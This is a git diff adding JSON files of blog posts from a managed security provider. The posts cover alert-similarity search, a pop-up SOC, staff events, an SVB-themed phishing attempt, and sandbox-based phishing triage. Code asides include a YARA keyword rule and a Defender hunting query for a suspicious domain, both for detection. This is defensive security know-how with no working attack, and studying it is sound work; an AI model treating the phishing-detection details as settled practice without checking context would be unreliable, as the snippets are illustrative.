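index = pinecone.Index("alerts")  # hypothetical index name

alert_vector = [0.1] * 128  # stand-in embedding; in practice produced by Arnie

# Store the embedding with a little metadata...
index.upsert(vectors=[("alert-123", alert_vector, {"vendor": "example-edr"})])

# ...then ask: what other alerts look similar to this one?
neighbors = index.query(vector=alert_vector, top_k=5, include_metadata=True)
```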
We were really impressed by the performance we were able to achieve and how quick and easy their service was to set up and use. Step 3: Implementing our Alert Similarity feature We\u2019re lucky to have an extremely talented core platform team here at Expel that provides infrastructure capabilities we can reliably build on. Implementing our feature was as simple as using these building blocks and best practices for our use case. Release day Once the system components were built and running in staging, we needed to coordinate a release in production that didn\u2019t introduce risk into our usual business operations. Alert Suggestion would produce suggestions in Expel Workbench like this, which could inform decisions made by our SOC analysts. However, if our feature didn\u2019t work as expected \u2013 or worse, created incorrect suggestions \u2013 we could cause confusion or defects in our process. To mitigate these risks when moving to production, it was important to gather metrics on the performance and accuracy of our feature before we started putting suggestions in front of our analysts. We used LaunchDarkly and Datadog to accomplish this. LaunchDarkly feature flags allowed us to deploy to production silently \u2013 meaning the feature runs behind the scenes and is invisible to end users. This allowed us to build a Datadog dashboard with all kinds of useful metrics like: How quickly we\u2019re able to produce a suggestion The percentage of alerts we can create suggestions for How often our suggestions are correct (we did this by comparing what the analyst did with the alert versus what we suggested) Model performance (accuracy, recall, F1 score) The time it takes analysts to handle alerts with and without suggestions To say these metrics were invaluable would be an understatement. Deploying our feature silently for a period of time allowed us to identify several bugs and correct them without having any impact on our customers. This boosted confidence in Alert Similarity before we flipped the switch. When the time came, deployment was as simple as updating a single feature flag in LaunchDarkly. What we\u2019ve learned so far We launched Alert Similarity in February 2022, and throughout the building process we learned (or in many cases, reaffirmed) several important things: Communication is key. You can\u2019t move an organization forward with code alone. The time we spent sharing research, reviewing design documents, and gathering feedback was crucial to the success of this project. There\u2019s nothing like real production data. A silent release with feature flags and metrics allowed us to identify and fix bugs without affecting our analysts or customers. This approach also gave us data to feel confident that we were ready to release the feature. We\u2019ll look to reuse this process in the future. If you can\u2019t measure it, you don\u2019t understand it. This whole journey from beginning to end was driven by data, allowing us to move forward based on a validated hypothesis and realistic goals versus intuition. This is how we knew our investment was worth the time and how we were able to prove the value of Alert Similarity once it was live. What\u2019s next? Although we targeted suggestions powered by Alert Similarity as our first feature, we anticipate an exciting road ahead filled with additional features and use cases. We\u2019re interested in exploring other types of documents that are crucial to our success and how similarity search could unlock new value and efficiencies.
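As a brief aside on the silent-release mechanics described earlier: gating suggestions behind a LaunchDarkly flag while emitting metrics can be sketched roughly as below. The flag key, metric name, helper function, and SDK call shapes are assumptions for illustration (LaunchDarkly and Datadog client APIs vary by version), not our actual code.

```python
# Rough sketch of a "silent release": always compute the suggestion and emit
# metrics, but only surface it to analysts when the feature flag is on.
# Flag key, metric names, and produce_suggestion() are illustrative.
import ldclient
from ldclient.config import Config
from datadog import initialize, statsd

ldclient.set_config(Config("YOUR_LAUNCHDARKLY_SDK_KEY"))
initialize(statsd_host="localhost", statsd_port=8125)

def produce_suggestion(alert):
    ...  # hypothetical: look up similar alerts and return a suggested disposition

def handle_alert(alert, analyst_key):
    suggestion = produce_suggestion(alert)
    statsd.increment("alert_suggestion.produced")  # measured even while silent

    visible = ldclient.get().variation(
        "alert-suggestions-visible", {"key": analyst_key}, False
    )
    if visible and suggestion is not None:
        return suggestion  # shown to analysts only after the flag is flipped
    return None            # silent mode: metrics only, no change for end users
```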
Additionally, as we alluded to above, there\u2019s always room for improvement when transforming documents into vector embeddings. We\u2019re already exploring new ways to represent security alerts that improve our ability to find similar neighbors for alerts. We see a whole world of opportunities where similarity search can help us, and we\u2019ll continue experimenting, building and sharing what we learn along the way. Interested in more engineering tips and tricks, and ideas for building your own features to enhance your service (and make your analysts\u2019 lives easier?) Subscribe to our blog to get the latest posts sent right to your inbox." +} \ No newline at end of file diff --git a/how-we-built-it-the-expel-soc-in-the-sky.json b/how-we-built-it-the-expel-soc-in-the-sky.json new file mode 100644 index 0000000000000000000000000000000000000000..fa6eaad58c1073a11ac887a5714f5f2669b5a71f --- /dev/null +++ b/how-we-built-it-the-expel-soc-in-the-sky.json @@ -0,0 +1,6 @@ +{ + "title": "How we built it: the Expel SOC-in-the-Sky", + "url": "https://expel.com/blog/how-we-built-it-the-expel-soc-in-the-sky/", + "date": "Mar 10, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG How we built it: the Expel SOC-in-the-Sky Expel insider \u00b7 2 MIN READ \u00b7 JON HENCINSKI \u00b7 MAR 10, 2023 \u00b7 TAGS: MDR This February, over 400 Expletives flocked from all over to convene in Miami for our first-ever company kickoff (CKO) celebration. It was a week of laughs, collaboration, excitement, and, for some of us, in-person introductions to co-workers we\u2019ve only ever met via Zoom. But with great events come great logistical challenges, particularly for a 24\u00d77 service like ours. So the question became: how do we ensure the hardworking folks in the Expel security operations center (SOC), who so often devote their nights and weekends to our customers, can also come to Miami and benefit from in-person camaraderie? Turns out, the answer was a \u201cSOC-in-the-Sky.\u201d This meant converting a multi-purpose room on the top floor of the hotel hosting CKO (S/O to the Hyatt Regency, Miami) into an around-the-clock mobile SOC\u2014which we called SOC-in-the-Sky because how cool does that sound? The team touched down the Saturday before the festivities and got to work outfitting the space with the necessary infrastructure. That included making sure we had things like external monitors, privacy screens, redundant power supplies, fast internet connections, and just the right amount of physical security to protect the space. And of course, the requisite amount of energy drinks. Now, it\u2019s a SOC. All of these details set up our SOC for success to do what they do: monitor and defend more than 300 customers and their entities from cyber attacks. To put that into perspective, over 300 customers and their entities means continuously: monitoring millions of endpoints, identities, cloud resources and workloads distributed across five different continents, and providing phishing expertise to hundreds of thousands of people around the world. Over the course of a typical day in our SOC-in-the-Sky, we processed around 2.5-3.5 billion events from 100+ tech integrations with our platform. Those events were all processed through Josie\u2122, our detection bot, who filtered and passed better than a thousand events to the Expel team for human judgment. Those filtered events were then picked up in mere minutes by our SOC analysts. 
The SOC team runs hundreds of investigative actions through Expel Workbench\u2122, our security operations platform, and in the process they identify somewhere between 10-15 security incidents for multiple customers. These security incidents are a mix of account takeover activity, deployment of malware to gain initial access by ransomware operators, abuse of cloud misconfigurations, and authorized red teams. Ruxie\u2122, our orchestration bot, runs thousands of investigative actions on behalf of our analysts. Ruxie is also smart enough to make triage decisions\u2014it closes around 5% of the alerts sent to the Expel SOC for review and handles about a third of all investigations performed in any given day. Let\u2019s see, what else? Oh, right. We investigate around 1,000 suspicious email submissions from our customers each day. How the heck do we do it? We put information and people in the exact right place at the exact right moment. The net of it all is we\u2019re able to take billions of events, use the right mix of people and technology to find the things that matter quickly, figure out what happened, and take action to reduce risk. This is what happened in the SOC-in-the-Sky. It was the physical representation of the intersection of our platform and our people, each doing what they do best. Want a deeper dive into the patterns and trends our SOC identified last year? Check out our annual threat report, Great eXpeltations , for a behind-the-scenes peak." +} \ No newline at end of file diff --git a/how-we-celebrated-women-s-history-month-at-expel.json b/how-we-celebrated-women-s-history-month-at-expel.json new file mode 100644 index 0000000000000000000000000000000000000000..c72b5e960e097d35bedd898aabcf40d60d4db061 --- /dev/null +++ b/how-we-celebrated-women-s-history-month-at-expel.json @@ -0,0 +1,6 @@ +{ + "title": "How WE celebrated Women's History Month at Expel", + "url": "https://expel.com/blog/how-we-celebrated-womens-history-month-at-expel/", + "date": "Apr 7, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG How WE celebrated Women\u2019s History Month at Expel Talent \u00b7 3 MIN READ \u00b7 BROOKE MCCLARY AND NEIKO LAMPKIN \u00b7 APR 7, 2023 \u00b7 TAGS: Careers / Company news We never pass up the opportunity to celebrate women at Expel, and Women\u2019s History Month in March is one of our favorite times of the year to do just that. We\u2019re pretty proud of our employee resource groups (ERGs) at Expel\u2014which include BOLD (our ERG for Black Expletives and allies), The Treehouse (our LGBTQIA+ and allies), The Connection (for supporting each others\u2019 mental health), and WE (the Women of Expel and allies). Founded in 2018, WE was Expel\u2019s first ERG, and we\u2019ve since reorganized and expanded to capture the spirit of the crew that\u2019s helping to power, scale, shape, and drive the company to ever-greater heights. This year\u2019s WE Women\u2019s History Month programming centered on the interconnectivity between all our ERGs and focused on how we can elevate each other, both in March and year-round. Here\u2019s a quick recap. WE heard\u2014and learned\u2014from Dr. Kumea Shorter-Gooden. Early in the month, our WE and BOLD ERGs co-hosted an engaging discussion led by Dr. Kumea Shorter-Gooden , co-author of Shifting: The Double Lives of Black Women in America. Dr. 
Shorter-Gooden\u2019s session, \u201cDoing Double Duty: Black Women in the World of Work,\u201d addressed common ways Black women are forced to \u201cshift\u201d as a response to racial and gender bias in the workplace. Dr. Shorter-Gooden acknowledged that Black women\u2019s mistakes are often hyper-visible, yet successes are invisible; this is a vexing challenge that\u2019s near-impossible to navigate. She offered advice on how allies can show up for Black women and others with marginalized identities, and attendees left with a better understanding of the lived experiences of our fellow Expletives. WE highlighted badass change-makers from the past 25 years. Each week, we celebrated a woman from recent history who forged a path for herself and others, with each spotlight focusing on someone representing one of our ERGs. The list included: Amanda Gorman : The youngest inaugural poet (at just 22) in U.S. history. You might remember her from President Biden\u2019s inauguration, where she delivered an original poem titled, \u201cThe Hill We Climb.\u201d Rosemary Ketchum : In 2020, Rosemary shattered the \u201c lavender ceiling \u201d and became the first out trans person to be elected in West Virginia. Bren\u00e9 Brown : A research professor at the University of Houston who holds a doctoral degree in social work, Bren\u00e9 is famous for her viral talks on a range of uncomfortable emotions. Taraji P. Henson : Actress, producer, author, and long time mental health advocate, Taraji founded the Boris Lawrence Henson Foundation in 2018 with a focus on providing options for therapy to Black men in particular. WE spotlighted the women of Expel who make a big impact, every day. We also took some time to recognize and celebrate each other with daily Slack spotlights the on women Expletives who make a big impact across our organization. Our own Nicole Jouvelakas, Director, Growth Marketing, collected survey responses from anyone interested in submitting across the entire organization. And the results were inspiring. An example of a daily Slack spotlight celebrating the women of Expel Why did we do this? Because when we lift each other up, we all benefit. We also heard from Tina Velez, Manager, Solution Architecture, in our LnL (Live \u2018n\u2019 Learn) series, where she walked us through each of her career stops. This riveting discussion, which she called \u201cI love fire,\u201d focused on the challenges she faced working in male-dominated fields and, most importantly, how she overcame the headwinds to succeed every time. WE visited Sweetbriar College for an important Women in Tech Panel. On March 30, members of our WE ERG took a short road trip to Sweetbriar College to host a Women In Tech Panel showcasing what it\u2019s like to work in tech, and the variety of roles within the tech space (in fewer words: you don\u2019t have to be an engineer to work in tech) . Sweetbriar has one of only two (Accreditation Board for Engineering and Technology) ABET-accredited engineering programs at women\u2019s colleges in the United States. WE participated in InHerSight\u2019s Women\u2019s History Month campaign. InHerSight \u2014an anonymous platform measuring how well companies support women employees\u2014used March to highlight some of the amazing women at its partner companies. 
They asked \u201cwomen to tell [them] why they\u2019re proud of their background or how their identity influences how they show up, whether for work or life.\u201d Expel\u2019s Orianna Bilby, Principal Program Manager, Engineering, answered the call, resulting in this LinkedIn feature. Orianna shares her perspective with InHerSight WE explored the intersectionality of women\u2019s stories with those of other marginalized groups. First, BOLD\u2019s monthly discussion centered on Centering Black Muslim Women during Women\u2019s History Month and Ramadan . Attendees spent time Listening to the Stories of Black Muslim Women and discussed ways to be mindful of women\u2019s experiences, the role intersectionality plays in the unique experiences of women that belong to additional marginalized groups, and our own personal experiences with holding those within our circles accountable in our fight for a just, equitable, and inclusive society for women. Then the monthly Treehouse session considered the Divine Feminine . This open dialogue revolved around defining the concept, how members personally connect with it, and how it affects social and political spaces. Like we said up top, we never pass up the opportunity to celebrate women at Expel\u2014and that won\u2019t stop after March. Keep an eye on our socials ( @ExpelSecurity ) throughout the year as we periodically highlight our women colleagues, and check out our equity, inclusion, and diversity (EID) page to learn more about our ERGs." +} \ No newline at end of file diff --git a/how-we-spotted-it-a-silicon-valley-bank-phishing-attempt.json b/how-we-spotted-it-a-silicon-valley-bank-phishing-attempt.json new file mode 100644 index 0000000000000000000000000000000000000000..e4c88a01c7c9dc73006c62b73712616643b3d36b --- /dev/null +++ b/how-we-spotted-it-a-silicon-valley-bank-phishing-attempt.json @@ -0,0 +1,6 @@ +{ + "title": "How we spotted it: A Silicon Valley Bank phishing attempt", + "url": "https://expel.com/blog/how-we-spotted-it-a-silicon-valley-bank-phishing-attempt/", + "date": "Mar 24, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG How we spotted it: A Silicon Valley Bank phishing attempt Security operations \u00b7 2 MIN READ \u00b7 HIRANYA MIR, JOSE TALENO AND CHRISTINE BILLIE \u00b7 MAR 24, 2023 \u00b7 TAGS: MDR / Tech tools As we wrote recently , we expected the failure of Silicon Valley Bank (SVB) to open the door to counterparty fraud attempts. Our CISO Greg Notch explained: An increased volume of bank account switching presents a massive opportunity for payment counterparty fraud. If an attacker is able to deceive someone into altering a few account and routing numbers, they can direct money to themselves, rather than your vendor or into your own accounts. Often this begins with compromised or forged emails resulting from business email compromise (BEC). Depending on the size of your environment, this may go unnoticed for some time. By the time you detect the attack, you could be out a significant amount of money\u2014and you\u2019ll still owe your vendor. As expected, it wasn\u2019t long before we saw our first fraud attempt via phishing attack. Since we knew our customers would likely be targets of SVB phishing attempts, our security operations center (SOC) analysts were on it before the customer could even submit the suspicious email to our phishing team. Here\u2019s how we did it. 
First, our analysts created a YARA rule to help identify any emails with affiliated keywords or domains, automatically adding them into our high-priority investigation queue. As it turns out, this is exactly how the attack began (see step 1 in the below graphic). A rule match increased the severity of the alert in our queue in order to get eyes on it ASAP, and we noted that the email headers displayed signs of possible spoofing. (When we see the \u201cspf=fail\u201d value, we\u2019re immediately suspicious.) From there, we saw that the sender\u2019s IP address wasn\u2019t affiliated with DocuSign, so there were red flags popping up all over. In step 2, we examined the body of the email. The email address\u2014kycrefreshteam@svb.com\u2014is the sender posing as an SVB employee. It\u2019s important to note this email did not actually come from anyone at SVB. However, the attacker is impersonating an employee to masquerade as a legitimate party. At first glance, the email looks legitimate. There are no obvious spelling, grammar, or punctuation errors. However, given the circumstances surrounding the collapse of the bank and the red flags identified in step 1, we\u2019re closer to knowing for sure that this is a phishing attempt. It\u2019s standard practice in our SOC to double-check any risks associated with action requests within an email, which we see in step 3. The \u201creview documents\u201d button in the email leads to an illegitimate customer login page, spoofed to mimic a page on the customer\u2019s website, which asks users to submit their SVB account credentials. In this case, our custom YARA detection rule\u2014set up to flag specific malicious domains for SVB\u2014flagged the phishing attempt for additional urgency and scrutiny , but we essentially go through the same sort of investigation for any suspicious email that customers submit to our phishing team. Unfortunately, we expect to see more of this sort of activity in the coming days and weeks, especially as the banking industry navigates some choppy waters. If you\u2019re interested in our phishing offering, click here to learn more." +} \ No newline at end of file diff --git a/how-we-use-vmray-to-support-expel-for-phishing.json b/how-we-use-vmray-to-support-expel-for-phishing.json new file mode 100644 index 0000000000000000000000000000000000000000..df784fb3eadbc50d19869be0fc83228176ef77da --- /dev/null +++ b/how-we-use-vmray-to-support-expel-for-phishing.json @@ -0,0 +1,6 @@ +{ + "title": "How we use VMRay to support Expel for Phishing", + "url": "https://expel.com/blog/how-we-use-vmray-to-support-expel-for-phishing/", + "date": "Sep 21, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG How we use VMRay to support Expel for Phishing Security operations \u00b7 4 MIN READ \u00b7 RAY PUGH AND HIRANYA MIR \u00b7 SEP 21, 2021 \u00b7 TAGS: MDR / Tech tools Tech helps us create space to focus on building human expertise. For example, tools like VMRay allow us to use a hands-on approach to phishing email triage here at Expel. Automated email solutions are an excellent supplement, but there\u2019s no replacement for human eyes on a suspicious sample that slips through the cracks. TL;DR: We harness the human moment to identify the full scope of risk to our customer\u2019s environments. As part of our phishing service, we use automation to triage phishing emails , and our analysts look at every email that our customers\u2019 users report. 
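Circling back to the YARA rule mentioned in the SVB write-up above: a rough illustration of a keyword/domain rule, compiled and matched from Python with yara-python, might look like the following. The rule name, strings, and match threshold are invented for the example and are not the actual detection.

```python
# Illustrative keyword/domain YARA rule for routing suspected SVB-themed
# phish to a high-priority queue. Rule contents and file name are made up.
import yara

RULE = r"""
rule possible_svb_phish
{
    strings:
        $kyc  = "kyc" nocase
        $svb  = "svb.com" nocase
        $docs = "review documents" nocase
    condition:
        2 of them
}
"""

rules = yara.compile(source=RULE)
with open("suspicious_email.eml", "rb") as fh:
    matches = rules.match(data=fh.read())
print(matches)  # non-empty => bump alert severity for analyst review
```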
We also help our customers get the full picture of what\u2019s happening in their environment by integrating with their endpoint detection and response (EDR) tools. How does it work? First, a customer end-user hits the suspicious email reporting button, which generates an alert for analyst review in the Expel Workbench\u2122. Enrichment and automation surface supplementary information in an easily digestible way. From there, we decide whether the email is benign or poses a threat to the customer environment. When a threat is found, we quickly get to work answering two key questions: Who else received this email? Was anyone compromised? To answer these questions, we connect to the customer\u2019s tech stack \u2013 whether it\u2019s email message trace logs stored in their SIEM, network traffic monitored through their firewall or endpoint signal through their EDR. We use the indicators from a malicious email and the tech stack to determine whether compromises are present in the environment. If we spot a compromise, we notify our customer immediately so we can work in parallel to get the threat remediated. In this post, we\u2019ll walk you through how we use VMRay for our Expel managed phishing service , and share our thoughts on how VMRay can help you protect your org\u2019s environment. Tools we use to investigate potentially malicious emails We use both internally built tools as well as enrichment pulled through third-party sources to perform analysis. The most important capability in our investigative toolkit is VMRay. Whether it\u2019s investigating a suspicious link that redirects to a credential harvester or a suspicious Microsoft Word document that may contain malicious macros \u2013 VMRay allows us to detonate these samples safely and generate a detailed report of resulting activity. Armed with this information, we provide detailed, thorough recommendations to our customers. Why we chose VMRay VMRay integrates well with our approach because, whether it\u2019s through manual input in the VMRay console or uploading content through the API, we\u2019re able to send numerous samples at one time for analysis simultaneously. This tech gives our analysts the space to multitask and, as a result, ensure we provide timely results and responses to our customers. Considering we operate in an industry where minutes matter \u2013 this can make all the difference when it comes to stopping evil before bad things happen. VMRay also makes it easy to interact with malicious content. It performs analysis automatically, and offers an interactive mode when needed. And, again, we love that it generates detailed analytical findings reports. Investigating a phishing email using VMRay We routinely use VMRay for two types of email threats: suspicious links within the body of an email and suspicious files included with an email as attachments. For suspicious links, we submit the URL in question to VMRay for both static and dynamic analysis, defaulting to automated mode and including interactive mode in some circumstances. This provides our analysts with the flexibility to simulate a normal user and extract all of the malicious indicators safely. The detailed report available immediately following analysis serves as the basis for scoping the customer\u2019s environment for signs of compromise. Below is an example of what one of these reports look like. VMRay web analysis report VMray\u2019s web analysis report tells us that there\u2019s a redirect to another site which contains a logon page. 
This is a key indicator that we\u2019re dealing with a credential harvesting page. Example VMRay visual cue VMRay generates screenshots after its analysis report to provide visual cues. In this case, we observe a suspicious URL enticing the user to interact with another link to access a fake proposal document. Credential harvesting landing page After the user interacts with the link, they\u2019re redirected to a credential harvesting landing page. Fake sign-in page example In the image above, you see that after several attempts the user is redirected to a Microsoft page which gives the illusion that it\u2019s legitimate. Microsoft Defender for Endpoint You\u2019ll see that we use Microsoft Defender for Endpoint to identify potential clickers by scoping for the malicious domains on the endpoint. Microsoft Defender for Endpoint Since we didn\u2019t generate any results scoping the malicious domain, we can confidently conclude that no one was compromised. Some malware is configured to detect and evade sandboxes, so VMRay simulates a realistic user endpoint complete with files, user profiles, simulated cursor movement and other attributes to combat this attacker technique and fool the malware into executing. If malicious, the file executes thinking it landed on an unsuspecting host and VMRay tracks all of its behavior. At the end, our analysts are able to review the results for key indicators which we can use to scope the customer\u2019s environment for signs of compromise. VMRay dynamic analysis Above is a screenshot of a VMRay dynamic analysis report. What we\u2019re seeing indicates that the Excel file contains VBA macros, which is a common way attackers embed malicious code. Another interesting observation is that upon execution it creates a \u201ccurl\u201d process, suggesting the file may be trying to download another payload. How we use VMRay to further scope our customer\u2019s tech for signs of compromise Analysts use the indicators from the VMRay analysis to scope the respective customer\u2019s environment for any signs of potential compromise. The Expel Workbench lets our analysts query automatically through the API, but analysts can also pivot directly into the console for further investigation when necessary. If there aren\u2019t signs of compromise, which is often the case as we aim to stay ahead of the threat, we give our customers succinct recommendations to stop the threat in its tracks. In cases where signs of active compromise are discovered, we engage the customer immediately for remediation and work collaboratively until the situation is fully resolved. How you can use VMRay in your own environment We\u2019ve continually expanded our managed phishing service , which is why we\u2019ve made an optimized integration with VMRay and its suite of capabilities a priority. This helps us maintain efficiency and accuracy while minimizing risk for our analyst team. Analyzing numerous samples at the same time while gathering detailed data about each sample is truly a game changer, especially for a pervasive industry threat like phishing. Lastly, the features and ease of use help analysts of all experience levels build their investigative muscles. Automating key pieces of the investigative process helps newer team members climb the already steep learning curve more quickly. Phishing attacks are on the rise \u2013 especially business email compromise (BEC). Want to find out how we protect our customers from BEC? Check out Expel for Email ."
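As a footnote to the Defender for Endpoint scoping step described above, the same \u201cdid anyone connect to this domain?\u201d question can also be asked programmatically via the advanced hunting API. Token acquisition is omitted and the domain is a placeholder; treat this as a sketch rather than production tooling.

```python
# Hedged sketch: scope a suspicious domain across endpoints using the
# Microsoft Defender for Endpoint advanced hunting API. The domain and
# access token are placeholders.
import requests

access_token = "<OAuth token from your Azure AD app registration>"

QUERY = """
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has "malicious-domain.example"
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl
"""

resp = requests.post(
    "https://api.securitycenter.microsoft.com/api/advancedqueries/run",
    headers={"Authorization": f"Bearer {access_token}"},
    json={"Query": QUERY},
    timeout=30,
)
for row in resp.json().get("Results", []):
    print(row["Timestamp"], row["DeviceName"], row["RemoteUrl"])
```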
+} \ No newline at end of file diff --git a/improving-the-phishing-triage-process-keeping-our.json b/improving-the-phishing-triage-process-keeping-our.json new file mode 100644 index 0000000000000000000000000000000000000000..fd3d726f2e2f150d8279016fd8f99b7dcb7f4eb8 --- /dev/null +++ b/improving-the-phishing-triage-process-keeping-our.json @@ -0,0 +1,6 @@ +{ + "title": "Improving the phishing triage process: Keeping our ...", + "url": "https://expel.com/blog/improving-the-phishing-triage-process/", + "date": "Jan 5, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Improving the phishing triage process: Keeping our analysts (and our customers) sane Security operations \u00b7 8 MIN READ \u00b7 BEN BRIGIDA, PETER SILBERMAN AND RAY PUGH \u00b7 JAN 5, 2021 \u00b7 TAGS: MDR / Tech tools Manually triaging phishing emails is painful. We\u2019ve heard from customers that of those who employ analysts in house to focus solely on phishing, the retention rate of those employees is usually less than a year. No wonder. The work is never-ending. Billions of malicious emails are sent each day. And that\u2019s not even the bulk of it. End users, if properly trained, will smash the phishing reporting button for anything suspicious or annoying. Plenty of marketing emails and spam messages get caught in the nets (sorry, marketers \u2013 just calling it like we see it). This tedious work is what makes triage so painful. Analysts have to figure out if the email is bad, and if it is, they need to investigate it. According to APWG\u2019s 2020 Phishing Activity Trends Report , attackers create nearly 200,000 unique malicious websites and over 100,000 unique malicious subjects per month. That\u2019s a lot of copy-pasting. Yet the importance of reviewing reported phishing emails can\u2019t be understated. Phishing is the primary source of compromises , and has been for some time . So how do you balance the importance of reviewing phishing emails with the monotony of the work? That\u2019s exactly what we\u2019re working to solve for here at Expel. Get the right people and then build the right tech First, we set out to solve the people problem. By that we mean: how can we do high-quality work without making our people miserable? We assembled a diverse, enthusiastic team of skilled analysts. ( This piece is really important .) Next, we set out to change the game and make phishing triage phun again (can\u2019t stop, won\u2019t stop). At Expel we believe analysts need meaningful and interesting work. So we had to figure out how to make phishing meaningful to us while also delivering value to our customers. We decided we don\u2019t want to stop at just telling our customers that an email is bad. We also want to tell them things like; who else got the email and was anyone compromised (meaning someone clicked the link and submitted data, downloaded/executed the attachment, etc). These are the questions we think are most important to our Expel for Phishing customers. And we think they should be important to anyone providing or buying a phishing service. To accomplish this, and make the work engaging for our analysts, we use all the technology in our customer\u2019s environment that Expel supports (a total of 55 different integrations) to actually investigate (yes, we look at things like EDR, netflow \u2013 gasp \u2013 and URL logs) and work to answer the questions above. Great start, but how do you take tedious work and make it scalable? 
If you\u2019ve read our previous blog posts , you\u2019ll know how strongly we believe that humans are best suited for making decisions and building relationships. Everything else (like gathering data, crunching numbers and formatting data) is better suited for technology to handle. Based on our experience doing this, we think that when you apply technology to aid humans, you should automate what you understand (not what you think), then measure and iterate. So we built technology to automate the tedious steps we knew existed.The goal of this automation is to provide the right information at the right time for the analyst to make a decision. We call this \u201cdecision support\u201d (keep an eye out for a future blog on this topic). We want to make it so that our analysts can make informed decisions ( quickly ) and do what they enjoy most \u2013 finding bad guys and ruining their day. Want a breakdown of how we make decisions about phishing emails? Gon\u2019 give it to ya Just like attacker tactics are constantly evolving, we\u2019re continuously improving our approach for automation and decision support to help keep our analysts fresh and focused. Let\u2019s take a look at an example that was submitted for review. Phishing email example First things first: Is this email benign or malicious? We have a framework we use to train our analysts to answer this question. The framework helps break down what to think about when triaging an email. The three buckets of our phishing investigation framework are: Impersonation \u2013 Are there signs the sender is impersonating someone (is Simon really emailing our accounting department)? Is the link impersonating a legit domain (typosquatting)? Is the attachment posing as an image file when it\u2019s actually a different file type altogether? Are there typos? Intent \u2013 Does the activity we\u2019re seeing make logical sense (would \u201cSimon\u201d email us about an overdue invoice)? Are the indicators consistent with legit email traffic? How would an attacker benefit from this? Are they asking for sensitive information that a legitimate person or institution would already know? Action \u2013 Is the user prompted to take action? Is the subject matter financially motivated? Are they directed to click the link or download a file? Is there a sense of urgency (Is \u201cSimon\u201d demanding payment right away)? The technology we\u2019ve built supports surfacing information relevant to the various themes. The first focus of our decision support was to make it fast and easy to look at the email. We safely and securely render the email and produce a PNG of the rendered email. This can tell an analyst a lot about the email. This also helps quickly eliminate things like marketing emails that were submitted for review. In addition we use third-party data enrichment to gather additional context about the sender, receiver and more. For example, we\u2019re huge fans of emailrep.io and we use them to surface context on how reputable the email sender is. Below is an example of what we\u2018ll see in the Expel Workbench\u2122: Example of automated decision support In addition we use other services to surface context on IP , domain, information on whether file attachments are present and what the files do. All of this provides almost instant, meaningful decision support to our analysts. As we operated the service, we also noticed a lot of duplicate emails. 
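As the next paragraph explains, many of these duplicates differ only cosmetically. One way to surface that is to embed each email\u2019s text and compare vectors; here is a minimal sketch using the sentence-transformers library, where the model name and similarity threshold are illustrative assumptions rather than the model we actually deployed.

```python
# Hedged sketch: flag a newly reported email that is semantically similar to
# one we have already triaged. Model name, example text, and threshold are
# illustrative only.
from sentence_transformers import SentenceTransformer, util

model = SentenceTransformer("all-MiniLM-L6-v2")

new_email = "Your invoice #4821 is overdue. Click here to review and pay today."
previously_triaged = [
    "Your invoice #3377 is overdue. Click here to review and pay immediately.",
    "Weekly marketing newsletter: product updates and webinars.",
]

new_vec = model.encode(new_email, convert_to_tensor=True)
old_vecs = model.encode(previously_triaged, convert_to_tensor=True)

for text, score in zip(previously_triaged, util.cos_sim(new_vec, old_vecs)[0]):
    if float(score) > 0.8:  # illustrative similarity threshold
        print(f"looks like an email we already triaged ({float(score):.2f}): {text}")
```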
Usually, the only thing changed might be the signature block or the sender but the overall intent of the email was unchanged. Using machine learning to find similar emails To help our analysts with answering the question of whether they\u2019ve already seen a similar email, we deployed a machine learning model that creates text embeddings of the email so that we can subsequently find semantically similar emails (if there are any) and surface those to our analysts. Example of similar email scoring Establishing a cycle of quality control checks With technology and automation comes an often overlooked responsibility of continuous quality control and improvement. We use manual quality control (QC) checks. The nice thing about QC checks is that they aren\u2019t just serving the purpose of reviewing what the automation is producing; they\u2019re also identifying new areas that can be automated. Part of our QC checks review what our analysts are doing. Are they performing repetitive tasks, tasks that are error prone or tasks that are better done by technology? If so, that could be an opportunity for automation. At Expel we\u2019ve talked about some of our security operations quality checks . In building out the Expel for Phishing service we developed a separate set of quality control checks. Our structured QC process entails a daily review process to make sure the technology and analyst outcomes meet our high-quality standards. Just like the MDR service, we review a sample of phishing investigations each day to make sure that we\u2019re making the right decisions and, just as important, we took the right steps to reach the conclusion. A second set of eyes can offer a unique perspective \u2013 we have made a number of feature requests based on these reviews. We\u2019re talking about things from typosquatted domains identification to formatting changes in the results to draw attention to important info. In the past 3,000 emails we analyzed, about 85 percent of them are benign (marketing emails, sales emails and generic spam). Finding ways to quickly spot and dispatch harmless emails is equally important for scaling our team. Sifting through benign emails and identifying the true threats is just the beginning of our process. This is where the real meaningful work (i.e. fun for an analyst) begins. Investigating a malicious email Like I mentioned before, while other services can tell you if an email is bad or not, we think that\u2019s not enough. We need to be able to answer those important questions (Who else received this email? Was anyone compromised?). Well, this is the part where I tell you how we get to those answers quickly. Our integrations with customer\u2019 security technology via the Expel Workbench platform gives us the ability to go deeper than other phishing services and actually answer these questions. The screenshot below shows an example of an investigative step that demonstrates the way we use our customer\u2019s security investment to get to answers. In this situation, the analyst confirmed that a phishing website was collecting user credentials. We wanted to see who else across the enterprise had accessed the domain. The analyst used what we call an \u201cinvestigative action,\u201d which asks multiple customer onboarded security technologies the same question without the analyst having to worry about the vendor specifics of how, since the platform takes care of that. 
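Conceptually, an investigative action like the one just described fans a single question out to every onboarded technology and merges the answers for the analyst. The sketch below uses hypothetical adapter objects with a query_domain method; it illustrates the pattern, not the actual implementation.

```python
# Hedged sketch of a fan-out "investigative action": ask every onboarded
# security device the same question and merge the results. Adapter classes
# (EDR, SIEM, firewall clients) are hypothetical.
from concurrent.futures import ThreadPoolExecutor

class QueryDomain:
    """Ask every onboarded device: 'did anyone in the enterprise visit this domain?'"""

    def __init__(self, integrations):
        # e.g., [EdrClient(), SiemClient(), FirewallClient()] -- hypothetical adapters
        self.integrations = integrations

    def run(self, domain):
        with ThreadPoolExecutor() as pool:
            futures = {pool.submit(i.query_domain, domain): i for i in self.integrations}
            results = {}
            for future, integration in futures.items():
                results[integration.name] = future.result()
        return results  # one merged view for the analyst to review
```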
